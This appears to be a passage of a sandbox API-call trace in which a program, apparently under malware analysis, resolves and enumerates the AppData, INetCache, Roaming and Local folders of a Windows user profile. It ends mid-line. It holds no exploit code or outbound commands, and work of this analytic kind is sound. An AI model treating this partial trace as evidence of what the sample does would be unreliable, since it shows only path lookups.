[0052.712] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x69e70 [0052.712] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.713] GetLastError () returned 0x12 [0052.713] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.713] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.713] SysReAllocStringLen (in: pbstr=0x13ffd80*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffd80*="c:\\Users\\") returned 1 [0052.713] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.713] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a330 [0052.713] FindNextFileW (in: hFindFile=0x6a330, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.713] GetLastError () returned 0x12 [0052.713] FindClose (in: hFindFile=0x6a330 | out: hFindFile=0x6a330) returned 1 [0052.714] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.714] SysReAllocStringLen (in: pbstr=0x13ffd80*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffd80*="c:\\Users\\FD1HVy\\") returned 1 [0052.714] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="appdata", len=0x7 | out: pbstr=0x13ffaa8*="appdata") returned 1 [0052.714] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\appdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x6a4f0 [0052.714] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0052.714] GetLastError () returned 0x12 [0052.714] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.714] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\AppData", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData") returned 1 [0052.715] SysReAllocStringLen (in: pbstr=0x13ffd80*="c:\\Users\\FD1HVy\\AppData", psz="c:\\Users\\FD1HVy\\AppData\\", len=0x18 | out: pbstr=0x13ffd80*="c:\\Users\\FD1HVy\\AppData\\") returned 1 [0052.715] SysReAllocStringLen (in: pbstr=0x13ffaa8*="appdata", psz="local", len=0x5 | out: pbstr=0x13ffaa8*="local") returned 1 [0052.715] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\local", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x6a030 [0052.715] FindNextFileW (in: hFindFile=0x6a030, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0052.715] GetLastError () returned 0x12 [0052.715] FindClose (in: hFindFile=0x6a030 | out: hFindFile=0x6a030) returned 1 [0052.716] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\microsoft", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x6a2b0 [0052.716] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0052.716] GetLastError () returned 0x12 [0052.716] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.716] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\windows", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x69f30 [0052.716] FindNextFileW (in: hFindFile=0x69f30, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0052.716] GetLastError () returned 0x12 [0052.716] FindClose (in: hFindFile=0x69f30 | out: hFindFile=0x69f30) returned 1 [0052.717] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\inetcache", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe3955f00, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe3955f00, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 0x69e70 [0052.717] FindNextFileW (in: hFindFile=0x69e70, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe3955f00, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe3955f00, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 0 [0052.717] GetLastError () returned 0x12 [0052.717] FindClose (in: hFindFile=0x69e70 | out: hFindFile=0x69e70) returned 1 [0052.720] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", len=0x3a | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\") returned 1 [0052.720] SysReAllocStringLen (in: pbstr=0x13ffd80*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache", len=0x39 | out: pbstr=0x13ffd80*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 1 [0052.720] SysReAllocStringLen (in: pbstr=0x13ffd84*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache", len=0x39 | out: pbstr=0x13ffd84*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 1 [0052.720] SysReAllocStringLen (in: pbstr=0xe60080*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\", len=0x3a | out: pbstr=0xe60080*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache\\") returned 1 [0052.720] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 0x0 [0052.720] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Roaming", cchLength=0x1f | out: lpsz="c:\\users\\fd1hvy\\appdata\\roaming") returned 0x1f [0052.720] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\appdata\\roaming", len=0x1f | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\appdata\\roaming") returned 1 [0052.720] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.721] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="users", len=0x5 | out: pbstr=0xe2267c*="users") returned 1 [0052.721] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.721] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="appdata", len=0x7 | out: pbstr=0xe20818*="appdata") returned 1 [0052.721] SysReAllocStringLen (in: pbstr=0xe600cc*=0x0, psz="roaming", len=0x7 | out: pbstr=0xe600cc*="roaming") returned 1 [0052.721] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersacheesss (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.721] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvycheesss (x86)\x01", lpUsedDefaultChar=0x0) returned 6 [0052.721] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="appdata", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appdataheesss (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.721] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="roaming", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="roamingheesss (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.722] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.722] SysReAllocStringLen (in: pbstr=0x13ffd74*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffd74*="c:\\") returned 1 [0052.722] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.722] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a4f0 [0052.722] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.722] GetLastError () returned 0x12 [0052.722] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.722] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.722] SysReAllocStringLen (in: pbstr=0x13ffd74*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffd74*="c:\\Users\\") returned 1 [0052.722] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.722] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a4f0 [0052.722] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.723] GetLastError () returned 0x12 [0052.723] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.723] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.723] SysReAllocStringLen (in: pbstr=0x13ffd74*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\") returned 1 [0052.723] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="appdata", len=0x7 | out: pbstr=0x13ffaa8*="appdata") returned 1 [0052.723] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\appdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x6a2b0 [0052.723] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0052.723] GetLastError () returned 0x12 [0052.723] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.723] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\AppData", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData") returned 1 [0052.723] SysReAllocStringLen (in: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\AppData", psz="c:\\Users\\FD1HVy\\AppData\\", len=0x18 | out: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\AppData\\") returned 1 [0052.723] SysReAllocStringLen (in: pbstr=0x13ffaa8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x13ffaa8*="roaming") returned 1 [0052.723] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\roaming", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe5873a38, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5873a38, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x6a070 [0052.724] FindNextFileW (in: hFindFile=0x6a070, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe5873a38, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5873a38, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0052.724] GetLastError () returned 0x12 [0052.724] FindClose (in: hFindFile=0x6a070 | out: hFindFile=0x6a070) returned 1 [0052.724] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\", psz="c:\\Users\\FD1HVy\\AppData\\Roaming", len=0x1f | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Roaming") returned 1 [0052.724] SysReAllocStringLen (in: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\AppData\\Roaming", psz="c:\\Users\\FD1HVy\\AppData\\Roaming\\", len=0x20 | out: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 1 [0052.724] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Roaming\\", len=0x20 | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 1 [0052.724] SysReAllocStringLen (in: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\AppData\\Roaming\\", psz="c:\\Users\\FD1HVy\\AppData\\Roaming", len=0x1f | out: pbstr=0x13ffd74*="c:\\Users\\FD1HVy\\AppData\\Roaming") returned 1 [0052.725] SysReAllocStringLen (in: pbstr=0x13ffd78*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Roaming", len=0x1f | out: pbstr=0x13ffd78*="c:\\Users\\FD1HVy\\AppData\\Roaming") returned 1 [0052.725] SysReAllocStringLen (in: pbstr=0xe60084*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Roaming\\", len=0x20 | out: pbstr=0xe60084*="c:\\Users\\FD1HVy\\AppData\\Roaming\\") returned 1 [0052.725] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0052.726] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local", cchLength=0x1d | out: lpsz="c:\\users\\fd1hvy\\appdata\\local") returned 0x1d [0052.726] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local", len=0x1d | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\appdata\\local") returned 1 [0052.726] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.726] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="users", len=0x5 | out: pbstr=0xe20818*="users") returned 1 [0052.726] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.726] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="appdata", len=0x7 | out: pbstr=0xe2267c*="appdata") returned 1 [0052.726] SysReAllocStringLen (in: pbstr=0xe600cc*=0x0, psz="local", len=0x5 | out: pbstr=0xe600cc*="local") returned 1 [0052.726] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersê?\x01\x19X»vÐ{\x06", lpUsedDefaultChar=0x0) returned 5 [0052.726] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvy?\x01\x19X»vÐ{\x06", lpUsedDefaultChar=0x0) returned 6 [0052.727] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="appdata", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appdata\x01\x19X»vÐ{\x06", lpUsedDefaultChar=0x0) returned 7 [0052.727] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="local", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localta\x01\x19X»vÐ{\x06", lpUsedDefaultChar=0x0) returned 5 [0052.727] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.727] SysReAllocStringLen (in: pbstr=0x13ffd68*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffd68*="c:\\") returned 1 [0052.727] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.727] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a2b0 [0052.727] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.727] GetLastError () returned 0x12 [0052.727] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.727] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.728] SysReAllocStringLen (in: pbstr=0x13ffd68*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: 